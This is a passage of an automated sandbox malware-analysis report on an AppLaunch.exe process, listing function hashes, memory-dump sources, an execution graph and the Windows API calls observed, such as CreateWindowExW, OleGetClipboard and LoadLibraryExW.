                                                                                                                                    • Opcode Fuzzy Hash: 449ca551de0e260640f7b65c0144277fad59bb037de5bac91d01de21786e066d
                                                                                                                                    • Instruction Fuzzy Hash: FCB0123100460F8BC5807B61F50780C3F1D5DC0A0C3950810920C495259EE428998F8E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05640440, Relevance: .0, Instructions: 6COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dd68553b28bb8faa228796ee9cc744a25cc465b25c3520eccad47ee08cfba8e8
                                                                                                                                    • Instruction ID: 11c708144429350b4b4168d253335077c858b7ff390d1e45ed58fe1395426300
                                                                                                                                    • Opcode Fuzzy Hash: dd68553b28bb8faa228796ee9cc744a25cc465b25c3520eccad47ee08cfba8e8
                                                                                                                                    • Instruction Fuzzy Hash: 20B09268820281F2EE00ABA0E00B3443BA4F310304F628416E00005001AF3521918B09
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 05645518, Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,~lk$,~lk$,~lk$,~lk$,~lk$,~lk$,~lk
                                                                                                                                    • API String ID: 0-804866611
                                                                                                                                    • Opcode ID: 1884fc22f26fb66c22d6f07a6f099a5c358d2c7dee4c7452eb82973d876f0996
                                                                                                                                    • Instruction ID: 4ec9ec98e417183a1be25c4133b7ac55c43b6689387886d199a0d0e1697f8007
                                                                                                                                    • Opcode Fuzzy Hash: 1884fc22f26fb66c22d6f07a6f099a5c358d2c7dee4c7452eb82973d876f0996
                                                                                                                                    • Instruction Fuzzy Hash: 9F31E438714119BBDB05A738A9A553F725BEBD6554B20481DD40297390CF3C6C0647B7
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05645951, Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,~lk$,~lk$,~lk$,~lk$,~lk$,~lk$,~lk
                                                                                                                                    • API String ID: 0-804866611
                                                                                                                                    • Opcode ID: 9494f22c31c8d500e7be93d97f260bf5f5d95a0fa1bdd98b8c11e077a4252471
                                                                                                                                    • Instruction ID: 028c4a63157a509b137f5275e82391438e96c54333f56c359103e7b47d62248e
                                                                                                                                    • Opcode Fuzzy Hash: 9494f22c31c8d500e7be93d97f260bf5f5d95a0fa1bdd98b8c11e077a4252471
                                                                                                                                    • Instruction Fuzzy Hash: FD31D038B14008BBDB05A738D9A5A3F325BEBDA584F254C2DD4029B391CF3D6C0A47A7
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Analysis Process: AppLaunch.exe PID: 7016 Parent PID: 5576 AppLaunch.exeCOMMON

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:13.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:300
                                                                                                                                    Total number of Limit Nodes:24

                                                                                                                                    Graph

                                                                                                                                    execution_graph 23392 53cd01c 23393 53cd034 23392->23393 23394 53cd08e 23393->23394 23397 97f06e8 23393->23397 23402 97f06d8 23393->23402 23398 97f0715 23397->23398 23399 97f0747 23398->23399 23407 97f0870 23398->23407 23412 97f0860 23398->23412 23403 97f0715 23402->23403 23404 97f0747 23403->23404 23405 97f0870 4 API calls 23403->23405 23406 97f0860 4 API calls 23403->23406 23405->23404 23406->23404 23409 97f0884 23407->23409 23408 97f0910 23408->23399 23417 97f0928 23409->23417 23421 97f0918 23409->23421 23414 97f0884 23412->23414 23413 97f0910 23413->23399 23415 97f0928 4 API calls 23414->23415 23416 97f0918 4 API calls 23414->23416 23415->23413 23416->23413 23418 97f0939 23417->23418 23425 97f4e98 23417->23425 23433 97f4ea0 23417->23433 23418->23408 23422 97f0939 23421->23422 23423 97f4e98 4 API calls 23421->23423 23424 97f4ea0 4 API calls 23421->23424 23422->23408 23423->23422 23424->23422 23426 97f4ebb 23425->23426 23428 97f4eb1 23425->23428 23441 97f3ff4 23426->23441 23430 97f4ed8 23428->23430 23446 97f4f14 23428->23446 23429 97f4ec0 23429->23418 23430->23418 23431 97f4f04 23431->23418 23434 97f4ebb 23433->23434 23435 97f4eb1 23433->23435 23436 97f3ff4 2 API calls 23434->23436 23437 97f4ed8 23435->23437 23440 97f4f14 2 API calls 23435->23440 23439 97f4ec0 23436->23439 23437->23418 23438 97f4f04 23438->23418 23439->23418 23440->23438 23442 97f3fff 23441->23442 23443 97fa02c 23442->23443 23451 97fa107 23442->23451 23459 97fa110 23442->23459 23443->23429 23447 97f4f31 23446->23447 23448 97f507e 23447->23448 23490 97f56a8 23447->23490 23496 97f56a1 23447->23496 23448->23431 23452 97fa128 23451->23452 23467 97fa1f8 23452->23467 23454 97fa15f 23454->23443 23455 97fa141 23455->23443 23460 97fa128 23459->23460 23464 97fa1f8 OleInitialize 23460->23464 23461 97fa13d 23463 97fa141 23461->23463 23465 97fa318 OleGetClipboard 23461->23465 23466 97fa313 OleGetClipboard 23461->23466 23462 97fa15f 23462->23443 23463->23443 23464->23461 23465->23462 23466->23462 23468 97fa208 23467->23468 23479 97f9ccc 23468->23479 23471 97fa313 23473 97fa32d 23471->23473 23474 97fa353 23473->23474 23486 97f9de8 23473->23486 23474->23454 23475 97fa318 23477 97fa32d 23475->23477 23476 97f9de8 OleGetClipboard 23476->23477 23477->23476 23478 97fa353 23477->23478 23478->23454 23480 97f9cd7 23479->23480 23481 97fa13d 23480->23481 23483 97f6e8c 23480->23483 23481->23455 23481->23471 23481->23475 23484 97fa278 OleInitialize 23483->23484 23485 97fa2dc 23484->23485 23485->23481 23487 97fa3c0 OleGetClipboard 23486->23487 23489 97fa45a 23487->23489 23491 97f56ba 23490->23491 23492 97f56b3 23490->23492 23502 97f56d8 23491->23502 23510 97f56c8 23491->23510 23492->23448 23493 97f56c0 23493->23448 23497 97f56ba 23496->23497 23498 97f56b3 23496->23498 23500 97f56d8 2 API calls 23497->23500 23501 97f56c8 2 API calls 23497->23501 23498->23448 23499 97f56c0 23499->23448 23500->23499 23501->23499 23503 97f5708 23502->23503 23504 97f56e6 23502->23504 23505 97f1158 2 API calls 23503->23505 23507 97f56f4 23504->23507 23518 97f1158 23504->23518 23509 97f570f 23505->23509 23507->23493 23508 97f5730 23508->23493 23509->23493 23511 97f5708 23510->23511 23512 97f56e6 23510->23512 23513 97f1158 2 API calls 23511->23513 23514 97f1158 2 API calls 23512->23514 23515 97f56f4 23512->23515 23517 97f570f 23513->23517 23516 97f5730 23514->23516 23515->23493 23516->23493 23517->23493 23520 97f11a4 23518->23520 23519 97f1411 23519->23508 23520->23519 23523 97f5748 23520->23523 23528 97f5741 23520->23528 23524 97f578e 23523->23524 23525 97f57b1 23524->23525 23533 97f1dae 23524->23533 23537 97f1df0 23524->23537 23525->23519 23529 97f578e 23528->23529 23530 97f57b1 23529->23530 23531 97f1dae CallWindowProcW 23529->23531 23532 97f1df0 CallWindowProcW 23529->23532 23530->23519 23531->23530 23532->23530 23534 97f1ddd 23533->23534 23535 97f1e8a CallWindowProcW 23534->23535 23536 97f1e39 23534->23536 23535->23536 23536->23525 23538 97f1e32 23537->23538 23540 97f1e39 23537->23540 23539 97f1e8a CallWindowProcW 23538->23539 23538->23540 23539->23540 23540->23525 23541 56943e8 23542 56943f6 23541->23542 23548 5693e78 23542->23548 23549 5693e83 23548->23549 23560 5693e94 23549->23560 23551 56943ff 23552 97f3a80 23551->23552 23556 97f3a90 23551->23556 23553 97f3a90 23552->23553 23610 97f2fb4 23553->23610 23557 97f3aa2 23556->23557 23558 97f2fb4 3 API calls 23557->23558 23559 5694407 23558->23559 23561 5693e9f 23560->23561 23564 569410c 23561->23564 23563 569452d 23563->23551 23565 5694117 23564->23565 23568 569413c 23565->23568 23567 5694602 23567->23563 23569 5694147 23568->23569 23572 569416c 23569->23572 23571 5694711 23571->23567 23573 5694177 23572->23573 23574 5696ce4 23573->23574 23576 569af38 23573->23576 23574->23571 23578 569af69 23576->23578 23577 569af8d 23577->23574 23578->23577 23581 569b0f8 23578->23581 23585 569b0b5 23578->23585 23582 569b105 23581->23582 23583 569b13f 23582->23583 23589 5699c1c 23582->23589 23583->23577 23586 569b105 23585->23586 23587 5699c1c 2 API calls 23586->23587 23588 569b13f 23586->23588 23587->23588 23588->23577 23590 5699c27 23589->23590 23592 569be38 23590->23592 23593 569b434 23590->23593 23592->23592 23594 569b43f 23593->23594 23595 569416c 2 API calls 23594->23595 23596 569bea7 23595->23596 23600 569dc30 23596->23600 23605 569dc18 23596->23605 23597 569bee0 23597->23592 23601 569dc61 23600->23601 23602 569dc6d 23600->23602 23601->23602 23603 569df68 LoadLibraryExW GetModuleHandleW 23601->23603 23604 569df78 LoadLibraryExW GetModuleHandleW 23601->23604 23602->23597 23603->23602 23604->23602 23606 569dc25 23605->23606 23607 569dc6d 23606->23607 23608 569df68 LoadLibraryExW GetModuleHandleW 23606->23608 23609 569df78 LoadLibraryExW GetModuleHandleW 23606->23609 23607->23597 23608->23607 23609->23607 23613 97f2fbf 23610->23613 23614 97f2ff4 23613->23614 23615 97f2fff 23614->23615 23616 97f4253 23615->23616 23617 97f3da0 OleInitialize 23615->23617 23620 97f427e 23615->23620 23616->23620 23623 97f3da0 23616->23623 23617->23616 23625 97f3dab 23623->23625 23624 97f426b 23628 97fd2a7 23624->23628 23632 97fd2b8 23624->23632 23625->23624 23626 97f9ccc OleInitialize 23625->23626 23627 97fce64 23626->23627 23630 97fd31d 23628->23630 23629 97fd780 WaitMessage 23629->23630 23630->23629 23631 97fd36a 23630->23631 23631->23620 23633 97fd31d 23632->23633 23634 97fd780 WaitMessage 23633->23634 23635 97fd36a 23633->23635 23634->23633 23635->23620 23692 569f738 23693 569f7a0 CreateWindowExW 23692->23693 23695 569f85c 23693->23695 23695->23695 23696 97f9528 23697 97f9538 23696->23697 23698 97f56a8 2 API calls 23697->23698 23699 97f9541 23698->23699 23636 569f980 SetWindowLongW 23637 569f9ec 23636->23637 23638 569b840 DuplicateHandle 23639 569b8d6 23638->23639 23700 5698e30 23701 5698e3f 23700->23701 23704 5698f28 23700->23704 23712 5698f18 23700->23712 23705 5698f3b 23704->23705 23706 5698f53 23705->23706 23720 56991a0 23705->23720 23724 56991b0 23705->23724 23706->23701 23707 5698f4b 23707->23706 23708 5699150 GetModuleHandleW 23707->23708 23709 569917d 23708->23709 23709->23701 23713 5698f3b 23712->23713 23714 5698f53 23713->23714 23718 56991a0 LoadLibraryExW 23713->23718 23719 56991b0 LoadLibraryExW 23713->23719 23714->23701 23715 5698f4b 23715->23714 23716 5699150 GetModuleHandleW 23715->23716 23717 569917d 23716->23717 23717->23701 23718->23715 23719->23715 23721 56991c4 23720->23721 23723 56991e9 23721->23723 23728 5698298 23721->23728 23723->23707 23725 56991c4 23724->23725 23726 5698298 LoadLibraryExW 23725->23726 23727 56991e9 23725->23727 23726->23727 23727->23707 23729 5699390 LoadLibraryExW 23728->23729 23731 5699409 23729->23731 23731->23723 23732 569b210 GetCurrentProcess 23733 569b28a GetCurrentThread 23732->23733 23734 569b283 23732->23734 23735 569b2c0 23733->23735 23736 569b2c7 GetCurrentProcess 23733->23736 23734->23733 23735->23736 23739 569b2fd 23736->23739 23737 569b325 GetCurrentThreadId 23738 569b356 23737->23738 23739->23737 23640 97f58b0 23641 97f56a8 2 API calls 23640->23641 23642 97f58be 23641->23642 23643 97f4490 23649 97f44e5 23643->23649 23658 97f44e8 23643->23658 23644 97f44a0 23645 97f3df0 KiUserCallbackDispatcher 23644->23645 23646 97f44c0 23645->23646 23650 97f44e8 23649->23650 23651 97f45bf 23650->23651 23656 569dc18 2 API calls 23650->23656 23657 569dc30 2 API calls 23650->23657 23667 97f3efc 23651->23667 23653 97f4746 23654 97f4635 23654->23653 23679 97f3f8c 23654->23679 23656->23651 23657->23651 23659 97f4521 23658->23659 23660 97f45bf 23659->23660 23665 569dc18 2 API calls 23659->23665 23666 569dc30 2 API calls 23659->23666 23661 97f3efc 4 API calls 23660->23661 23663 97f4635 23661->23663 23662 97f4746 23663->23662 23664 97f3f8c SendMessageW 23663->23664 23664->23662 23665->23660 23666->23660 23668 97f3f07 23667->23668 23669 97f6391 23668->23669 23675 97f63e4 23668->23675 23688 97f4b9c CreateIconFromResourceEx SendMessageW CreateIconFromResourceEx CreateIconFromResourceEx 23668->23688 23670 97f63ca 23669->23670 23671 97f3f8c SendMessageW 23669->23671 23672 97f3f8c SendMessageW 23670->23672 23673 97f63bc 23671->23673 23674 97f63d6 23672->23674 23684 97f4bac 23673->23684 23677 97f4bac SendMessageW 23674->23677 23675->23654 23677->23675 23681 97f3f97 23679->23681 23680 97f845e 23680->23653 23681->23680 23682 97f6cc0 SendMessageW 23681->23682 23683 97f84c9 23682->23683 23683->23653 23685 97f4bb7 23684->23685 23689 97f6cc0 23685->23689 23688->23669 23690 97f84e0 SendMessageW 23689->23690 23691 97f84c9 23690->23691 23691->23670 23740 97f6980 23742 97f6991 23740->23742 23741 97f69fb 23742->23741 23745 97f64f4 23742->23745 23746 97f64ff 23745->23746 23747 97f69f4 23746->23747 23750 97f811c 23746->23750 23757 97f8120 23746->23757 23754 97f8130 23750->23754 23763 97f6c7c 23750->23763 23752 97f8147 23752->23747 23753 97f816f CreateIconFromResourceEx 23756 97f81ee 23753->23756 23754->23752 23754->23753 23755 97f6c7c CreateIconFromResourceEx 23754->23755 23755->23754 23756->23747 23758 97f8130 23757->23758 23759 97f6c7c CreateIconFromResourceEx 23758->23759 23760 97f8147 23758->23760 23761 97f816f CreateIconFromResourceEx 23758->23761 23759->23758 23760->23747 23762 97f81ee 23761->23762 23762->23747 23764 97f8170 CreateIconFromResourceEx 23763->23764 23765 97f81ee 23764->23765 23765->23754

                                                                                                                                    Executed Functions

                                                                                                                                    Function 097FD2B8, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 42 97fd2b8-97fd31b 43 97fd31d-97fd347 42->43 44 97fd34a-97fd368 42->44 43->44 49 97fd36a-97fd36c 44->49 50 97fd371-97fd3a8 44->50 52 97fd82a-97fd83f 49->52 54 97fd3ae-97fd3c2 50->54 55 97fd7d9 50->55 56 97fd3c4-97fd3ee 54->56 57 97fd3f1-97fd410 54->57 58 97fd7de-97fd7f4 55->58 56->57 64 97fd428-97fd42a 57->64 65 97fd412-97fd418 57->65 58->52 69 97fd42c-97fd444 64->69 70 97fd449-97fd452 64->70 67 97fd41c-97fd41e 65->67 68 97fd41a 65->68 67->64 68->64 69->58 71 97fd45a-97fd461 70->71 72 97fd46b-97fd472 71->72 73 97fd463-97fd469 71->73 75 97fd47c 72->75 76 97fd474-97fd47a 72->76 74 97fd47f-97fd49c call 97fc3a0 73->74 79 97fd4a2-97fd4a9 74->79 80 97fd5f1-97fd5f5 74->80 75->74 76->74 79->55 81 97fd4af-97fd4ec 79->81 82 97fd5fb-97fd5ff 80->82 83 97fd7c4-97fd7d7 80->83 91 97fd7ba-97fd7be 81->91 92 97fd4f2-97fd4f7 81->92 84 97fd619-97fd622 82->84 85 97fd601-97fd614 82->85 83->58 86 97fd624-97fd64e 84->86 87 97fd651-97fd658 84->87 85->58 86->87 89 97fd65e-97fd665 87->89 90 97fd6f7-97fd70c 87->90 94 97fd667-97fd691 89->94 95 97fd694-97fd6b6 89->95 90->91 104 97fd712-97fd714 90->104 91->71 91->83 96 97fd529-97fd53e call 97fc3c4 92->96 97 97fd4f9-97fd507 call 97fc3ac 92->97 94->95 95->90 132 97fd6b8-97fd6c2 95->132 102 97fd543-97fd547 96->102 97->96 107 97fd509-97fd522 call 97fc3b8 97->107 108 97fd549-97fd55b call 97fc3d0 102->108 109 97fd5b8-97fd5c5 102->109 110 97fd716-97fd74f 104->110 111 97fd761-97fd77e call 97fc3a0 104->111 117 97fd527 107->117 135 97fd55d-97fd58d 108->135 136 97fd59b-97fd5b3 108->136 109->91 124 97fd5cb-97fd5d5 call 97fc3e0 109->124 127 97fd758-97fd75f 110->127 128 97fd751-97fd757 110->128 111->91 123 97fd780-97fd7ac WaitMessage 111->123 117->102 129 97fd7ae 123->129 130 97fd7b3 123->130 138 97fd5d7-97fd5da call 97fc3ec 124->138 139 97fd5e4-97fd5ec call 97fc3f8 124->139 127->91 128->127 129->130 130->91 143 97fd6da-97fd6f5 132->143 144 97fd6c4-97fd6ca 132->144 150 97fd58f 135->150 151 97fd594 135->151 136->58 146 97fd5df 138->146 139->91 143->90 143->132 148 97fd6ce-97fd6d0 144->148 149 97fd6cc 144->149 146->91 148->143 149->143 150->151 151->136
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $Z]
                                                                                                                                    • API String ID: 0-435607470
                                                                                                                                    • Opcode ID: e494f4e741f596c8c79bdb1e8841ca3e66d4dfe60c64c5a433d024a7dce766d7
                                                                                                                                    • Instruction ID: e47bbf44cdb80d50294f7673e3de3442d485d15db685d904aa351474c526848a
                                                                                                                                    • Opcode Fuzzy Hash: e494f4e741f596c8c79bdb1e8841ca3e66d4dfe60c64c5a433d024a7dce766d7
                                                                                                                                    • Instruction Fuzzy Hash: 0CF17E31A00209CFDB24DFA9C869BADBBF1BF88314F158568E505BF3A5DB70A845CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569B200, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0569B270
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0569B2AD
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0569B2EA
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0569B343
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID: H~]
                                                                                                                                    • API String ID: 2063062207-1463972137
                                                                                                                                    • Opcode ID: 12b6439b7eada97b083db15a58a037c42b89f11bd8df10fa392dd5c71102c683
                                                                                                                                    • Instruction ID: 3afb26ba70f133b51043bb09ce93ddcb81f14b7cd273128cc931489a01a6b417
                                                                                                                                    • Opcode Fuzzy Hash: 12b6439b7eada97b083db15a58a037c42b89f11bd8df10fa392dd5c71102c683
                                                                                                                                    • Instruction Fuzzy Hash: AE5145B49056488FDB24CFAAE588BEEBBF0FF49314F24845AE109B7760CB755844CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569B210, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0569B270
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0569B2AD
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0569B2EA
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0569B343
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID: H~]
                                                                                                                                    • API String ID: 2063062207-1463972137
                                                                                                                                    • Opcode ID: e8a2e57cc719bd877ad3c549f65a93335b367dbca958fa21bd7b3ec446f0731b
                                                                                                                                    • Instruction ID: 288f370dfdca7ebc323a26cefd276d99031cd2c23bcf8f19f157be294483b67e
                                                                                                                                    • Opcode Fuzzy Hash: e8a2e57cc719bd877ad3c549f65a93335b367dbca958fa21bd7b3ec446f0731b
                                                                                                                                    • Instruction Fuzzy Hash: 1A5153B09056488FDB24CFAAD688BAEBBF4FF48304F208459E109B7360CB756844CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 097F1DF0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 154 97f1df0-97f1e2c 155 97f1edc-97f1efc 154->155 156 97f1e32-97f1e37 154->156 162 97f1eff-97f1f0c 155->162 157 97f1e8a-97f1ec2 CallWindowProcW 156->157 158 97f1e39-97f1e70 156->158 159 97f1ecb-97f1eda 157->159 160 97f1ec4-97f1eca 157->160 164 97f1e79-97f1e88 158->164 165 97f1e72-97f1e78 158->165 159->162 160->159 164->162 165->164
                                                                                                                                    APIs
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 097F1EB1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.926694130.00000000097F0000.00000040.00000001.sdmp, Offset: 097F0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_97f0000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallProcWindow
                                                                                                                                    • String ID: XD]
                                                                                                                                    • API String ID: 2714655100-782714608
                                                                                                                                    • Opcode ID: 2c331d537861ac9a435cc797503a3fe12f6a5085f303549a43f111d836200802
                                                                                                                                    • Instruction ID: 3b13ea4f99e3ff20c65983010cb12d13c7f54727101bbbae746b6bdc4a75dd6c
                                                                                                                                    • Opcode Fuzzy Hash: 2c331d537861ac9a435cc797503a3fe12f6a5085f303549a43f111d836200802
                                                                                                                                    • Instruction Fuzzy Hash: 954156B5A00249CFCB14CF99C488AAABBF5FF88314F25C559E519AB320C734A841CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05698F28, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 645 5698f28-5698f3d call 5698230 648 5698f3f 645->648 649 5698f53-5698f57 645->649 700 5698f45 call 56991a0 648->700 701 5698f45 call 56991b0 648->701 650 5698f59-5698f63 649->650 651 5698f6b-5698fac 649->651 650->651 656 5698fb9-5698fc7 651->656 657 5698fae-5698fb6 651->657 652 5698f4b-5698f4d 652->649 653 5699088-5699148 652->653 693 569914a-569914d 653->693 694 5699150-569917b GetModuleHandleW 653->694 658 5698fc9-5698fce 656->658 659 5698feb-5698fed 656->659 657->656 661 5698fd9 658->661 662 5698fd0-5698fd7 call 569823c 658->662 663 5698ff0-5698ff7 659->663 666 5698fdb-5698fe9 661->666 662->666 667 5698ff9-5699001 663->667 668 5699004-569900b 663->668 666->663 667->668 670 5699018-5699021 call 569824c 668->670 671 569900d-5699015 668->671 675 569902e-5699033 670->675 676 5699023-569902b 670->676 671->670 678 5699051-5699055 675->678 679 5699035-569903c 675->679 676->675 698 5699058 call 56994a8 678->698 699 5699058 call 5699481 678->699 679->678 680 569903e-569904e call 569825c call 569826c 679->680 680->678 683 569905b-569905e 686 5699081-5699087 683->686 687 5699060-569907e 683->687 687->686 693->694 695 569917d-5699183 694->695 696 5699184-5699198 694->696 695->696 698->683 699->683 700->652 701->652
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0569916E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                    • Opcode ID: f7ca73a63bc450eb3a3bc7f1f67cb87f2ea707fdf9e98835bf50907ac13289f5
                                                                                                                                    • Instruction ID: a1e8a1d75c879cb7d2eca7f7480fe0633c2ad81dbd274bc9fd32079776278ce9
                                                                                                                                    • Opcode Fuzzy Hash: f7ca73a63bc450eb3a3bc7f1f67cb87f2ea707fdf9e98835bf50907ac13289f5
                                                                                                                                    • Instruction Fuzzy Hash: EB712670A00B058FDB28DF6AD4547AABBF5BF88304F10892DD45ADBB50DB35E845CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569F72C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 702 569f72c-569f79e 703 569f7a9-569f7b0 702->703 704 569f7a0-569f7a6 702->704 705 569f7bb-569f7f3 703->705 706 569f7b2-569f7b8 703->706 704->703 707 569f7fb-569f85a CreateWindowExW 705->707 706->705 708 569f85c-569f862 707->708 709 569f863-569f89b 707->709 708->709 713 569f8a8 709->713 714 569f89d-569f8a0 709->714 715 569f8a9 713->715 714->713 715->715
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0569F84A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                    • Opcode ID: 2f123f9fbd765663ed09a0a318027a9028636da3cc17867f637ac379d9240138
                                                                                                                                    • Instruction ID: c65701a9f82833d5373e6ed73a075cac14731721d6e91dafe3ba427e54e82c6a
                                                                                                                                    • Opcode Fuzzy Hash: 2f123f9fbd765663ed09a0a318027a9028636da3cc17867f637ac379d9240138
                                                                                                                                    • Instruction Fuzzy Hash: 1B51C0B1D003099FDF19CF99D984ADEBBB5BF88314F25862AE419AB210D7749885CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0569F738, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 716 569f738-569f79e 717 569f7a9-569f7b0 716->717 718 569f7a0-569f7a6 716->718 719 569f7bb-569f85a CreateWindowExW 717->719 720 569f7b2-569f7b8 717->720 718->717 722 569f85c-569f862 719->722 723 569f863-569f89b 719->723 720->719 722->723 727 569f8a8 723->727 728 569f89d-569f8a0 723->728 729 569f8a9 727->729 728->727 729->729
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0569F84A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.924682786.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_5690000_AppLaunch.jbxd
                                                                                                                                    Similarity
